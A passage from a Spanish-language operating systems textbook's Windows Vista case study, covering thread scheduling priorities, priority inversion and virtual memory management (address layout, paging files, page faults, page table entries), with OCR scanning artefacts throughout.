lo del teclado o del ratón nunca se ejecutaría y el sistema quedaría paralizado. Para tener permiso de 
establecerla clase de prioridad a tiempo real, hay que habilitar un privilegio especial en el token del 
proceso. Los usuarios normales no tienen este privilegio. 
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Prioridad 



Por lo general, los hilos de aplicaciones se ejecutan en las prioridades de la 1 a la 15. Al esta¬ 
blecer las prioridades del proceso y de los hilos, una aplicación puede determinar qué hilos tienen 
preferencia. L os hilos del sistema déla página cero (ZeroPage) se ejecutan con prioridad de 0 y con¬ 
vierten las páginas libres en páginas con ceros. Hay un hilo ZeroPage separado para cada procesa¬ 
dor real. 

Cada hilo tiene una prioridad base, dependiendo de la clase de prioridad del proceso y la prio¬ 
ridad relativa del hilo. Pero la prioridad que se utiliza para determinar en cuál délas 32 listas sede- 
be poner un hilo en cola se determina con base en su prioridad actual, que por lo general es la misma 
que la prioridad base; pero no siempre es así. Bajo ciertas condiciones, el kernel impulsa la priori¬ 
dad actual de un hilo que no es de tiempo real para que sea mayor a la prioridad base (pero nunca 
mayor que la prioridad 15). Como el arreglo de la figura 11-28 se basa en la prioridad actual, al 
cambiar esta prioridad se ve afectada la programación. Nunca se hacen ajustes a los hilos de tiem¬ 
po real. 

Ahora veamos cuando se eleva la prioridad de un hilo. En primer lugar, cuando se completa 
una operación de E/S y se libera un hilo en espera, su prioridad se impulsa para que tenga la opor¬ 
tunidad de volverse a ejecutar con rapidez y pueda iniciar más operaciones de E/S. La idea aquí es 
mantener ocupados los dispositivos de E/S. La cantidad de impulso depende del dispositivo de E/S; 
por lo general es 1 para un disco, 2 para una línea serial, 6 para el teclado y 8 para la tarjeta de so¬ 
nido. 

En segundo lugar, si hay un hilo en espera de un semáforo, mutex o cualquier otro evento, al 
liberarlo su prioridad se impulsa 2 niveles arriba si está en el proceso en primer plano (el proceso 
que controla la ventana a la que se envía la entrada del teclado) y se impulsa 1 nivel en caso con¬ 
trario. Esta corrección tiende a elevar a los procesos interactivos por encima de la gran multitud, en 
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el nivel 8. Por último, si un hilo de GUI se despierta debido a que hay datos de entrada disponibles 
en la ventana, obtiene un impulso por la misma razón. 

Estos impulsos no son para siempre. Hacen efecto de inmediato y pueden ocasionar que la CPU 
se reprograme. Pero si un hilo utiliza todo su siguiente quantum, pierde un nivel de prioridad y se 
mueve una cola hacia abajo en el arreglo de prioridades. Si utiliza otro quantum completo, se mue¬ 
ve otro nivel hacia abajo, y así en lo sucesivo hasta que llega a su nivel base, en donde permanece 
hasta que se vuelve a impulsar. 

Hay otro caso en el que el sistema juega con las prioridades. Imagine que hay dos hilos traba¬ 
jando en un problema tipo productor-consumidor. El trabajo del productor es más duro, por lo que 
recibe una prioridad más alta (por decir, 12) en comparación con el consumidor (4). En cierto pun¬ 
to, el productor llena un búfer compartido y se bloquea en un semáforo, como se muestra en la fi¬ 
gura ll-29(a). 


© 

\ Rea 


Realiza una operación down 
\en el semáforo y se bloquea 


Semáforo 


(a) 



Listo 


/ Desea realizar una operación 
'^P semáforo, pero 


nunca se programa 


(b) 


Figura 11-29. U n ejemplo de la inversión de prioridad. 


Antes de que el consumidor tenga la oportunidad de ejecutarse de nuevo, un hilo no relaciona¬ 
do con prioridad de 8 pasa al estado listo y empieza a ejecutarse, como se muestra en la figura 
ll-29(b). M ientras que este hilo quiera ejecutarse lo podrá hacer, ya que tiene una prioridad de pla¬ 
nificación más alta que el consumidor, y el productor (aunque tiene una prioridad aún mayor) está 
bloqueado. Bajo estas circunstancias, el productor nunca se podrá ejecutar de nuevo hasta que el hi¬ 
lo con prioridad de 8 lo permita. 

Para resolver este problema, Windows utiliza lo que se podría denominar en forma caritativa 
un gran arreglo. El sistema lleva el registro de cuánto tiempo ha transcurrido desde la última vez 
que se ejecutó un hilo listo. Si excede a cierto valor de umbral, se mueve a la prioridad 15 por dos 
quantums. Esto puede darle la oportunidad de desbloquear al productor. Después de que transcu¬ 
rren los dos quantums, se elimina el impulso en forma abrupta, en vez de disminuirlo en forma 
gradual. Tal vez una mejor solución sería penalizar los hilos que utilizan su quantum una y otra 
vez, al reducir su prioridad. Después de todo, el problema no fue ocasionado por el hilo hambrien¬ 
to, sino por el hilo avaricioso. Este problema se conoce muy bien bajo el nombre inversión de 
prioridad. 
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Hay un problema análogo que ocurre si un hilo de prioridad 16 obtiene un mutex y no tiene 
oportunidad de ejecutarse por mucho tiempo, dejando hambrientos a varios hilos más importan¬ 
tes del sistema que esperan el mutex. Este problema se podría haber evitado dentro del sistema 
operativo, al hacer que un hilo que necesite un mutex por un periodo corto simplemente desha¬ 
bilite la planificación mientras está ocupado (en un multiprocesador, se debería utilizar un blo¬ 
queo de giro). 

Antes de terminar con el tema de la planificación, vale la pena decir unas palabras sobre el 
quantum. En los sistemas clientes de Windows, el valor predeterminado es de 20 mseg. En los sis¬ 
temas servidores de Windows es de 180 mseg. El quantum corto favorece a los usuarios interacti¬ 
vos, mientras que el largo reduce los cambios de contexto y por ende proporciona una mejor 
eficiencia. Estos valores predeterminados se pueden incrementar en forma manual por 2x, 4x o 6x, 
si se desea. 

Un último parche al algoritmo de planificación indica que cuando una nueva ventana se con¬ 
vierte en la ventana de primer plano, todos sus hilos obtienen un quantum más largo mediante una 
cantidad que se toma del registro. Este cambio les otorga más tiempo de la CPU, que por lo gene¬ 
ral se traduce en una mejor experiencia para el usuario en la aplicación cuya ventana se acaba de 
mover a primer plano. 


11.5 ADMINISTRACIÓN DE LA MEMORIA 

Windows Vista tiene un sistema de memoria virtual muy sofisticado. Tiene varias funciones 
de Win32 para utilizarlo, las cuales se implementan mediante el administrador de memoria: el com¬ 
ponente más grande del nivel ejecutivo de NTOS. En las siguientes secciones analizaremos los 
conceptos fundamentales, las llamadas a la API Win32 y, por último, la implementación. 

11.5.1 C onceptos fundamentales 

En Windows Vista, todos los procesos de usuario tienen su propio espacio de direcciones virtuales. En 
las máquinas x86 las direcciones virtuales son de 32 bits, por lo que cada proceso tiene 4 GB de es¬ 
pacio de direcciones virtuales. Este espacio se puede asignar como 2 GB de direcciones para el mo¬ 
do de usuario de cada proceso, o los sistemas servidores de Windows pueden configurar el sistema 
de manera opcional para ofrecer 3 GB en el modo de usuario. Los otros 2 GB (o 1 GB) se utilizan 
en el modo de kernel. En las máquinasx64 que se ejecutan en modo de 64 bits, las direcciones pue¬ 
den ser de 32 o de 64 bits. Las direcciones de 32 bits se utilizan para los procesos que se ejecutan 
con WOW64 para la compatibilidad con 32 bits. Como el kernel tiene muchas direcciones disponi¬ 
bles, dichos proceso de 32 bits en realidad pueden obtener 4 GB completos de espacio de direccio¬ 
nes si lo desean. Para x86 y x64, el espacio de direcciones virtuales se pagina bajo demanda, con 
un tamaño de página fijo de 4 KB; aunque en algunos casos, como veremos en breve, también se 
utilizan páginas grandes de 4 M B (mediante el uso de un directorio de páginas solamente y pasan¬ 
do por alto la tabla de páginas correspondiente). 

En la figura 11-30 se muestran las distribuciones del espacio de direcciones virtuales para los 
proceso x86 en forma simplificada. Los 64 KB de la parte inferior y de la parte superior del espacio 
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de direcciones virtuaies de cada proceso por io generai están desasignados. Esta eiección fue de ma¬ 
nera intencionai para ayudar a captar ios errores de programación. A menudo, ios apuntadores invá- 
iidos son O o -1, por io que ios intentos de utiiizarios en Windows producirán una trampa inmediata 
en vez de ieer basura o, peor aún, escribir en una ubicación incorrecta de ia memoria. 


4 GB 


2 GB 


o 


Proceso A 


Proceso B 


Reserva sin 
paginación 


Reserva sin 
paginación 

Reserva con paginación 


Reserva con paginación 




Tablas de páginas de A 


Tablas de páginas de B 

Pilas, datos, etc. 


Pilas, datos, etc. 

HAL + SO 


HAL + SO 

Datos del sistema 


Datos del sistema 

Código y datos 
privados del 
proceso A 


Código y datos 
privados del 
proceso B 


X 

Los 64 KB inferiores y 
superiores son inválidos 


Proceso C 


Reserva sin 
__paginMÍón_ 

Reserva con paginación 


Jablas_de jágjnasjie C 
Pilas, datos, etc. 

HAL + SO 
Datos del sistema 


Código y datos 
privados del 
proceso C 


Figura 11-30. Distribución del espacio de direcciones virtuales para los tres procesos 
de usuario en el x86. Las áreas en blanco son privadas por proceso. Las áreas sombrea¬ 
das se comparten entre todos los procesos. 


El código y los datos privados del usuario empiezan desde los 64 KB, y se extienden hasta ca¬ 
si 2GB.Los 2GB superiores contienen el sistema operativo, incluyendo el código, los datos y las 
reservas con y sin paginación. Los 2 GB superiores son la memoria virtual del kernel y se compar¬ 
ten entre todos los procesos, exceptuando los datos de la memoria virtual como las tablas de pági¬ 
nas y las listas de los conjuntos de trabajo, que son por proceso. La memoria virtual del kernel sólo 
es accesible mientras el sistema se ejecuta en modo de kernel. La razón de compartir la memoria 
virtual del proceso con el kernel es que, cuando un hilo realiza una llamada al sistema, se atrapa en 
modo de kernel y puede continuar su ejecución sin cambiar el mapa de memoria. Todo lo que hay 
que hacer es cambiar a la pila del kernel de ese hilo. Como las páginas en modo de usuario del pro¬ 
ceso todavía son accesibles, el código en modo de kernel puede leer los parámetros y acceder a los 
búferes sin tener que alternar entre los espacios de direcciones o realizar dobles asignaciones tem¬ 
porales de las páginas en ambos. Aquí la desventaja es que hay menos espacio de direcciones pri¬ 
vadas por proceso, a cambio de llamadas al sistema más rápidas. 

Windows permite a los hilos adjuntarse a otros espacios de direcciones mientras se ejecutan en 
el kernel. Al adjuntarse a un espacio de direcciones, el hilo puede acceder a todo el espacio de di¬ 
recciones en modo de usuario, así como las porciones del espacio de direcciones del kernel que son 
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específicas para un proceso, como la autoasignación para las tablas de páginas. Los hilos deben 
cambiar a su espacio de direcciones original antes de regresar al modo de usuario. 

Asignación de direcciones virtuaies 

Cada página de direcciones virtuales puede estar en uno de tres estados: inválida, reservada o con¬ 
firmada. Una página inváiida no está asignada a un objeto de sección de memoria en un momen¬ 
to dado, y una referencia a ella produce un fallo de página que a su vez origina una violación de 
acceso. Una vez que se asignan código o datos a una página virtual, se dice que la página está con¬ 
firmada. Un fallo de página en una página confirmada ocasiona que se asigne la página que con¬ 
tiene la dirección virtual que provocó la falla a una de las páginas representadas por el objeto de 
sección o almacenadas en el archivo de paginación. A menudo se da el caso de que se requiere asig¬ 
nar una página física, y se debe realizar una operación de E/S en el archivo representado por el ob¬ 
jeto de sección, para leer los datos del disco. Pero los fallos de página pueden ocurrir tan sólo 
debido a que la entrada en la tabla de páginas se necesita actualizar, ya que la página física a la que 
se hace referencia aún está en la caché de memoria, en cuyo caso no se requiere la operación de E/S. 
A éstos se les conoce como fallos suaves, y los analizaremos con más detalle en breve. 

Una página virtual también se puede encontrar en el estado reservado. Una página virtual re¬ 
servada es inválida, pero tiene la propiedad de que el administrador de memoria nunca asignará esas 
direcciones virtuales para otro propósito. Como ejemplo, cuando se crea un proceso, se reservan 
muchas páginas de espacio en la pila en modo de usuario en el espacio de direcciones virtuales del 
proceso, pero sólo se confirma una página. A medida que crezca la pila, el administrador de memo¬ 
ria confirmará de manera automática páginas adicionales en segundo plano, hasta que la reserva ca¬ 
si esté agotada. Las páginas reservadas funcionan como páginas de guardia para evitar que la pila 
crezca demasiado y sobrescriba otros datos del proceso. Reservar todas las páginas virtuales signi¬ 
fica que la pila puede crecer en un momento dado hasta su tamaño máximo, sin el riesgo de que se 
puedan otorgar para otro propósito algunas de las páginas contiguas del espacio de direcciones vir¬ 
tuales necesarias para la pila. A demás de los atributos inválida, reservada y confirmada, las páginas 
tienen otros atributos, como de lectura, de escritura y (en el caso de los procesadores compatibles 
con AM D64) ejecutable. 

A rchivos de paginación 

H ay una interesante concesión que ocurre al confirmar espacio de almacenamiento a la páginas con¬ 
firmadas que no se van a asignar a archivos específicos. Estas páginas utilizan el archivo de pagi¬ 
nación. La pregunta es cómo y cuándo asignar la página virtual a una ubicación específica en el 
archivo de paginación. Una estrategia simple sería asignar cada página virtual a una página en uno 
de los archivos de paginación en el disco, al momento en que se confirmara la página virtual. Esto 
garantiza que siempre haya un lugar conocido para escribir cada página confirmada, en caso deque 
sea necesario sacarla de la memoria. 

Windows utiliza una estrategia denominada justo a tiempo. Las páginas confirmadas que res¬ 
palda el archivo de paginación no reciben espacio en este archivo sino hasta cuando tienen que pa- 


882 


CASO DE ESTUDIO 2: WINDOWS VISTA 


CAPITULO 11 


ginarse fuera déla memoria. No se asigna ningún espacio en ei disco para ias páginas que nunca se 
paginan fuera de ia memoria. Si ia memoria virtuai totai es menos que ia memoria física disponi- 
bie, no se necesita un archivo de paginación para nada. Esto es conveniente para ios sistemas in¬ 
crustados que se basan en Windows. También es ia forma en que se inicia ei sistema, ya que ios 
archivos de paginación no se iniciaiizan sino hasta que se empieza a ejecutar ei primer proceso en 
modo de usuario, smss.exe. 

Con una estrategia de preasignación, ia memoria virtuai totai en ei sistema que se utiiiza para 
datos privados (pilas, montículo y páginas de código de copia al escribir) se limita al tamaño de los 
archivos de paginación. Con la asignación justo a tiempo, la memoria total virtual puede ser casi 
tan grande como el tamaño combinado de los archivos de paginación y la memoria física. Con los 
discos tan grandes y económicos en comparación con la memoria física, los ahorros en el espacio 
no son tan considerables como el posible incremento en el rendimiento. 

Con la paginación bajo demanda, las peticiones para leer páginas del disco necesitan iniciarse 
de inmediato, ya que el hilo que encontró la página que falta no puede continuar sino hasta que 
se complete esta operación de paginación hacia la memoria. Las posibles optimizaciones para pa¬ 
ginar las págiñas faltantes a la memoria implican tratar de prepaginar páginas adicionales en la mis¬ 
ma operación de E/S. Sin embargo, las operaciones que escriben páginas modificadas en el disco 
por lo general no están sincronizadas con la ejecución de los hilos. La estrategia de asignación jus¬ 
to a tiempo del espacio del archivo de paginación aprovecha esto para impulsar el rendimiento de 
escribir las páginas modificadas en el archivo de paginación. Las páginas modificadas se agrupan 
y se escriben en trozos grandes. Como la asignación del espacio en el archivo de paginación no ocu¬ 
rre sino hasta que se escriben las páginas, el número de búsquedas requeridas para escribir un lote 
de páginas se puede optimizar al asignar las páginas del archivo de paginación para que estén cer¬ 
ca unas de otras, o incluso para hacerlas contiguas. 

Cuando las páginas almacenadas en el archivo de paginación se leen en la memoria, mantienen 
su asignación en el archivo de paginación hasta la primera vez que se modifican. Si una página nun¬ 
ca se modifica, pasará a una lista especial de páginas físicas libres, conocida como lista de espera, 
en donde se puede volver a utilizar sin tener que escribirla de vuelta en el disco. Si de verdad se 
modifica, el administrador de memoria liberará la página del archivo de páginas y la única copia de 
esa página estará en la memoria. Para implementar esto, el administrador de memoria marca la pá¬ 
gina como de sólo lectura después de cargarla. La primera vez que un hilo intente escribir en la pági¬ 
na, el administrador de memoria detectará esta situación y liberará la página del archivo de páginas, 
otorgará acceso de escritura a la página y permitirá que el hilo intente de nuevo. 

Windows admite hasta 16 archivos de paginación, que por lo general se esparcen a través de varios 
discos separados para obtener un mayor ancho de banda de E/S. Cada archivo tiene un tamaño inicial y 
un tamaño máximo al que puede crecer más adelante si lo necesita, pero es mejor crear estos archivos 
para que tengan el tamaño máximo al momento de instalar el sistema. Si es necesario aumentar el archi¬ 
vo de paginación cuando el sistema de archivos está mucho más lleno, es probable que el nuevo espacio 
en el archivo de paginación esté muy fragmentado, con lo cual se reduce el rendimiento. 

El sistema operativo lleva el registro sobre cuál página virtual se asigna en qué parte de cuál 
archivo de paginación, al escribir esta información en las entradas en la tabla de páginas para el 
proceso para las páginas privadas, o en entradas en la tabla de páginas de prototipo asociadas con 
el objeto de sesión para las páginas compartidas. Además de las páginas respaldadas por el archi- 
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vo de paginación, muchas páginas en un proceso se asignan a archivos reguiares en ei sistema de 
archivos. 

Ei código ejecutabie y ios datos de sóio iectura en un archivo de programa (por ejempio, un 
EXE o DLL) se pueden asignar en ei espacio de direcciones de cuaiquier proceso que ios utiiice. 
Como estas páginas no se pueden modificar, nunca tendrán que paginarse fuera de ia memoria, pe¬ 
ro ias páginas físicas se pueden reutiiizar de inmediato, una vez que se marcan todas ias asignacio¬ 
nes en i a tabia de páginas como inváiidas. Cuando se necesite i a página de nuevo en ei futuro, ei 
administrador de memoria ia ieerá dei archivo dei programa. 

Aigunas veces, ias páginas que empiezan como de sóio iectura terminan modificándose. Por 
ejempio, ai estabiecer un punto de interrupción en ei código ai depurar un proceso, o ai corregir có¬ 
digo para reubicario en distintas direcciones dentro de un proceso, o ai reaiizar modificaciones a ias 
páginas de datos que empezaron compartidas. En casos como éstos, Windows (ai iguai que ia mayo¬ 
ría de ios sistemas operativos modernos) admite un tipo de página conocido como copia al escribir. 
Estas páginas empiezan como páginas asignadas ordinarias, pero cuando se intenta modificar cuai¬ 
quier parte de ia página, ei administrador de memoria reaiiza una copia privada en ia que se puede 
escribir. Después actuaiiza ia tabia de páginas para ia página virtuai, de manera que apunte a ia co¬ 
pia privada, y hace que ei hiio intente voiver a escribir, ei cuai ahora tendrá éxito. Si más tarde esa 
copia necesita paginarse fuera de ia memoria, se escribirá en ei archivo de paginación en vez dei ar¬ 
chivo originai. 

Además de asignar código y datos dei programa de ios archivos EXEyDLL,se pueden asig¬ 
nar archivos ordinarios en ia memoria, para que ios programas puedan hacer referencia a ios datos 
de ios archivos sin tener que reaiizar operaciones expiícitas de iectura y escritura. De todas formas 
se requieren operaciones de E/S, pero ei administrador de memoria ias proporciona de manera im- 
piícita mediante ei uso dei objeto sección para representar i a asignación entre ias páginas en memo¬ 
ria y ios bioques en ios archivos en ei disco. 

Los objetos de sección no tienen que hacer referencia a un archivo para nada. Pueden hacer re¬ 
ferencias a regiones anónimas de ia memoria. Ai asignar ios objetos de sección anónimos a varios 
procesos, se puede compartir ia memoria sin tener que asignar un archivo en ei disco. Como ias sec¬ 
ciones pueden recibir nombres en ei espacio de nombres de NT, ios procesos se pueden encontrar 
ai abrir ios objetos de sección por su nombre, así como dupiicar manejadoras para ios objetos de 
sección entre procesos. 

Direccionamiento de memorias físicas extensas 

Hace unos años, cuando ios espacios de direcciones de 16 bits (o 20 bits) eran ei estándar y ias má¬ 
quinas tenían megabytes de memoria física, se idearon todo tipo de trucos para permitir que ios pro¬ 
gramas utiiizaran más memoria física de ia que cabía en ei espacio de direcciones. A menudo, estos 
trucos se conocían bajo ei nombre de conmutación de bancos, en ia cuai un programa podía sus¬ 
tituir cierto bioque de memoria por encima dei iímite de 16 o 20 bits por un bioque de su propia 
memoria. Cuando se introdujeron ias máquinas de 32 bits, ia mayoría de ios equipos de escritorio 
sóio tenían unos cuantos megabytes de ia memoria física. Pero a medida que ia memoria se hace 
más densa en cuanto a ios circuitos integrados, ia cantidad de memoria comúnmente disponibie 
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aumentó de manera dramática. Esto afecta en primer iugar a ios servidores, en donde ias apiicacio- 
nes a menudo requieren más memoria. Los chips Xeon de Intei admiten ias Extensiones de direccio¬ 
nes físicas (PAE), ias cuaies permiten direccionar ia memoria física con 36 bits en vez de 32, io cuai 
significa que se pueden poner hasta 64 GB de memoria física en un soio sistema. Esto es mucho más 
que ios 2 o 3 GB que puede direccionar un soio proceso con ias direcciones virtuaies de 32 bits en 
modo de usuario, aunque muchas de ias grandes apiicaciones como ias bases de datos de SQL están 
diseñadas para ejecutarse en un espacio de direcciones de un soio proceso, por io que ia conmuta¬ 
ción de bancos vueive a entrar en acción, y ahora se ie conoce como AWE (Address Windowing Ex- 
tensions. Extensiones de ventana de dirección) en Windows. Esta herramienta permite a ios programas 
(que se ejecutan con ei priviiegio apropiado) soiicitar ia asignación de ia memoria física. Ei proceso 
que soiicita ia asignación puede entonces reservar direcciones virtuaies y soiicitar ai sistema opera¬ 
tivo que asigne regiones de páginas virtuaies directamente a ias páginas físicas. AWE es una soiu- 
ción provisionai hasta que todos ios servidores utiiicen direccionamiento de 64 bits. 

11.5.2 L lamadas al sistema para administrar la memoria 

La API Win32 contiene varias funciones que permiten a un proceso administrar su memoria virtuai 
de manera expiícita. Las funciones más importantes se iistan en ia figura 11-31. Todas eiias operan 
en una región que consiste de una soia página, o de una secuencia de dos o más páginas consecuti¬ 
vas en ei espacio de direcciones virtuaies. 


Función de la API Win32 

Descripción 

VirtualAlloc 

Reserva o confirma una región 

VirtualFree 

Libera o desconfirma una región 

VirtualProtect 

Cambia la protección de lectura/escritura/ejecución en una región 

VirtualQuery 

Consulta el estado de una región 

VirtualLock 

Flace a una región residente en la memoria (es decir, deshabilita su 
paginación) 

VirtualUnlock 

Flace a una región paginable de la manera usual 

CreateFileMapping 

Crea un objeto de asignación de archivos y (de manera opcional) le asigna 

un nombre 

MapViewOfFile 

Asigna (parte de) un archivo en el espacio de direcciones 

UnmapViewOfFile 

Quita un archivo asignado del espacio de direcciones 

OpenFileMapping 

Abre un objeto de asignación de archivos creado con anterioridad 


Figura 11.31. Las principales funciones de la API Wln32 para administrar la memo¬ 
ria virtual en Windows. 


Las primeras cuatro funciones de iaAPI se utiiizan para asignar, iiberar, proteger y consuitar 
regiones dei espacio de direcciones virtuaies. Las regiones asignadas siempre empiezan en ios iími- 
tes de 64 KB para minimizar ios probiemas de portabiiidad a ias futuras arquitecturas con páginas 
más grandes que ias actuaies. La cantidad actuai de espacio de direcciones asignado puede ser me¬ 
nor de 64 KB, pero debe ser un múitipio dei tamaño de ia página. Las siguientes dos funciones de 
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la API otorgan a un proceso la habilidad de fijar las páginas en la memoria, de manera que no se 
puedan paginar hacia fuera y deshacer esta propiedad. Por ejemplo, un programa en tiempo real po¬ 
dría necesitar páginas con esta propiedad para evitar los fallos de página al disco durante las ope¬ 
raciones críticas. El sistema operativo implementa un límite para evitar que los procesos se vuelvan 
demasiado avariciosos. En realidad las páginas sí se pueden quitar de la memoria, pero sólo si se 
intercambia todo el proceso hacia fuera de la memoria. Cuando se vuelve a traer a la memoria, to¬ 
das las páginas bloqueadas se vuelven a cargar antes de que cualquier hilo pueda volver a ejecutar¬ 
se. Aunque no se muestra en la figura 11-31. Windows Vista también tiene funciones de la API 
nativa para permitir que un proceso acceda a la memoria virtual de un proceso distinto sobre el cual 
haya recibido el control; es decir, para el que tenga un manejador (vea la figura 11-9). 

Las últimas cuatro funciones de la API que se listan son para administrar los archivos con asig¬ 
nación de memoria. Para asignar un archivo, primero se debe crear un objeto de asignación de ar¬ 
chivo (vea la figura 11-23) con createFiieMapping. Esta función devuelve un manejador al objeto 
de asignación de archivo (es decir, un objeto de sección) e introduce de manera opcional un nom¬ 
bre para él en el espacio de nombres de Win32, para que otros procesos lo puedan utilizar también. 
Las siguientes dos funciones asignan y desasignan vistas en los objetos de sección del espacio de 
direcciones virtuales de un proceso. Un proceso puede utilizar la última API para asignar por com¬ 
partición una asignación que haya creado otro proceso con CreateFiieMapping, por lo general una 
que se haya creado para asignar la memoria anónima. De esta forma, dos o más procesos pueden 
compartir regiones de sus espacios de direcciones. Esta técnica permite a cada proceso escribir en 
regiones limitadas de la memoria virtual del otro proceso. 

11.5.3 I mplementación de la administración de memoria 

En el x86, Windows Vista admite un espacio de direcciones lineal de4 GB con paginación bajo de¬ 
manda por cada proceso. La segmentación no se admite de ninguna forma. En teoría, los tamaños 
de página pueden ser cualquier potencia de 2, hasta 64 KB. En el Pentium, por lo general se fijan 
en 4 KB. Además, el sistema operativo puede utilizar páginas de 4 M B para mejorar la efectividad 
del TLB (Translation Lookaside Buffer, Búfer de traducción adelantada) en la unidad de adminis¬ 
tración de memoria del procesador. Como el kernel y las aplicaciones extensas utilizan páginas de 
4 M B, se mejora el rendimiento de manera considerable al aumentar la proporción de coincidencias 
para el TLB y reducir el número de veces que se tienen que recorrer las tablas de páginas para bus¬ 
car las entradas que faltan en el TLB. 

A diferencia del planificador, que selecciona los hilos individuales para ejecutarlos y no le preo¬ 
cupan mucho los procesos, el administrador de memoria trata sólo con los procesos y no le preocu¬ 
pan mucho los hilos. Después de todo, los procesos (y no los hilos) son los propietarios del espacio 
de direcciones, y eso es lo que le importa al administrador de memoria. Cuando se asigna una re¬ 
gión del espacio de direcciones virtuales, como se ha hecho con cuatro regiones para el proceso A 
en la figura 11-32, el administrador de memoria crea un VAD (Virtual Address Descriptor, Descrip¬ 
tor de direcciones virtuales) para ese proceso, en donde lista el rango de direcciones asignadas, la 
sección que representa el archivo de almacenamiento de respaldo y el desplazamiento en donde es¬ 
tá asignado, junto con los permisos. Cuando se hace contacto con la primera página, se crea el di¬ 
rectorio de tablas de páginas y se inserta su dirección física en el objeto de proceso. La lista de sus 
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VADs define un espacio de direcciones compieto. Los VA Ds se organizan en un árboi baianceado, 
de manera que se pueda encontrar con eficiencia ei descriptor para una dirección específica. Este 
esquema admite ios espacios de direcciones escasos. Las áreas sin utiiizar entre ias regiones asig¬ 
nadas no utiiizan recursos (memoria o disco), por io que en esencia están iibres. 


Región 


Proceso A 
pila 


j Datos 


Biblioteca 

compartida 


Programa 


Aimacenamiento de respaido en ei disco 

,__, 

r ^ 


Archivo de paginación 



Lib.dii 


Prog1.exe 


Prog2.exe 


Proceso B 
Piia 


Datos 


Bibiioteca 

compartida 


Programa 


Figura 11-32. Regiones asignadas con sus páginas sombra (shadow) en el disco. El ar¬ 
chivo lib.dll se asigna en dos espacios de direcciones al mismo tiempo. 


M anejo de los fallos de página 

Cuando un proceso inicia en Windows Vista, muchas de ias páginas que asignan ios archivos de 
imagen EX E y DLL dei programa tai vez ya se encuentren en memoria, debido a que se comparten 
con otros procesos. Las páginas que se pueden escribir de ias imágenes se marcan como copiar ai 
escribir, para que se puedan compartir hasta ei punto en que necesiten modificarse. Si ei sistema 
operativo reconoce ei EXE de una ejecución anterior, puede haber registrado ei patrón de referen¬ 
cia de páginas mediante una tecnoiogía que M icrosoft iiama SuperFetch, que intenta prepaginar 
muchas de ias páginas necesarias, inciuso si ei proceso no ha producido faiios de página para eiias 
todavía. Esto reduce ia iatencia ai momento de iniciar apiicaciones, ai trasiapar ia iectura de ias pá¬ 
ginas dei disco con ia ejecución dei código de iniciaiización en ias imágenes. M ejora ia veiocidad 
de transferencia ai disco debido a que es más fácii para ios drivers de disco organizar ias iecturas 
para reducir ei tiempo de búsqueda necesario. La prepaginación de ios procesos también se utiiiza 
durante ei inicio dei sistema, cuando una apiicación de segundo piano pasa ai primer piano y cuan¬ 
do se reinicia ei sistema después de ia hibernación. 

Ei administrador de memoria acepta ia prepaginación, pero ia impiementa como un componen¬ 
te separado dei sistema. Las páginas que se traen a ia memoria no se insertan en ia tabia de páginas 
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del proceso, sino en la lista de espera de la que se pueden insertar rápidamente en el proceso según 
sea necesario, sin tener que acceder al disco. 

Las páginas no asignadas son un poco distintas en cuanto a que no se inicializan al leer del ar¬ 
chivo. En vez de ello, la primera vez que se accede a una página no asignada, el administrador de 
memoria proporciona una nueva página física y se asegura de que el contenido sea sólo ceros (por 
cuestiones de seguridad). En los fallos subsiguientes, una página no asignada tal vez necesite en¬ 
contrarse en la memoria, o de lo contrario hay que leerla otra vez desde el archivo de paginación. 

La paginación bajo demanda en el administrador de memoria se controla mediante los fallos de 
página. En cada fallo de página se produce una trampa al kernel. Después el kernel crea un descrip¬ 
tor independiente de la máquina que indica lo que ocurrió, y pasa esta información a la parte del ad¬ 
ministrador de memoria correspondiente al ejecutivo. Después, el administrador de memoria 
comprueba la validez del acceso. Si la página que produjo el fallo se encuentra dentro de una re¬ 
gión confirmada, busca la dirección en la lista de VADs y encuentra (o crea) la entrada en la tabla 
de páginas del proceso. En el caso de una página compartida, el administrador de la memoria utili¬ 
za la entrada en la tabla de páginas de prototipo asociada con el objeto de sección, para llenar la 
nueva entrada en la tabla de páginas para las tablas de páginas del proceso. 

El formato de las entradas en la tabla de páginas difiere con base en la arquitectura del proce¬ 
sador. Para el x86 y el x64, las entradas para una página asignada se muestran en la figura 11-33. 
Si una entrada se marca como válida, el hardware interpreta su contenido de manera que la direc¬ 
ción virtual se pueda traducir en la página física correcta. Las páginas no asignadas también tienen 
entradas, pero se marcan como inválidas y el hardware ignora el resto de la entrada. El formato del 
software es algo distinto del formato del hardware, y se determina mediante el administrador de me¬ 
moria. Por ejemplo, para una página no asignada que se debe asignar y poner en ceros antes de po¬ 
der utilizarla, ese hecho se observa en la entrada en la tabla de páginas. 
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NX - No ejecutar 

AVL - Disponible para el SO 

G - Página global 

PAT - Tabla de atributos de página 

D - Sucia (modificada) 

A - Utilizada (referenciada) 


PCD - Deshabilita caché de página 
PWT - Escritura inmediata de página 
U/S - Usuario/supervisor 
R/W - Acceso de lectura/escritura 
P - Presente (válida) 


Figura 11-33. U na entrada en la tabla de páginas (PTE) para una página asignada en 
las arquitecturas (a) Intel x86 y (b) AM D x64. 


Hay dos bits importantes en la entrada en la tabla de páginas que se actualizan mediante el 
hardware directamente. Estos son los bits de acceso (A) y de página sucia (D). Estos bits llevan 
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el registro de cuándo se ha utilizado una asignación de una página específica para acceder a la pá¬ 
gina, y si ese acceso pudo haber modificado a la página al escribir en ella. Esto realmente ayuda al 
rendimiento del sistema, ya que el administrador de memoria puede usar el bit de acceso para im- 
plementar estilo de paginación LRU (Least-Recently U sed. Uso menos reciente). El principioLRU 
indica que las páginas que no se han utilizado durante más tiempo son las menos probables de uti¬ 
lizar de nuevo pronto. El bit de acceso permite al administrador de memoria determinar que se ac¬ 
cedió a una página. El bit sucio permite al administrador de memoria saber si una página se pudo 
haber modificado. O más bien, si una página no se ha modificado. Si no se ha modificado una pá¬ 
gina desde que se leyó del disco, el administrador de memoria no tiene que escribir el contenido de 
la página en el disco antes de usarla para algo más. 

Por lo general, el x86 utiliza una entrada en la tabla de páginas de 32 bits y el x64 utiliza una 
entrada en la tabla de páginas de 64 bits, como se muestra en la figura 11-33. La única diferencia 
en los campos es que el campo de número de página física es de 30 bits en vez de 20. Sin embar¬ 
go, los procesadores x64 existentes admiten una cantidad mucho menor de páginas físicas de las 
que se pueden representar mediante la arquitectura. El x86 también soporta un modo especial PAE 
(Physical Address Extensión, Extensión de dirección física) que se utiliza para permitir al proce¬ 
sador acceder a más de 4 GB de memoria física. Los bits del marco de página física adicional re¬ 
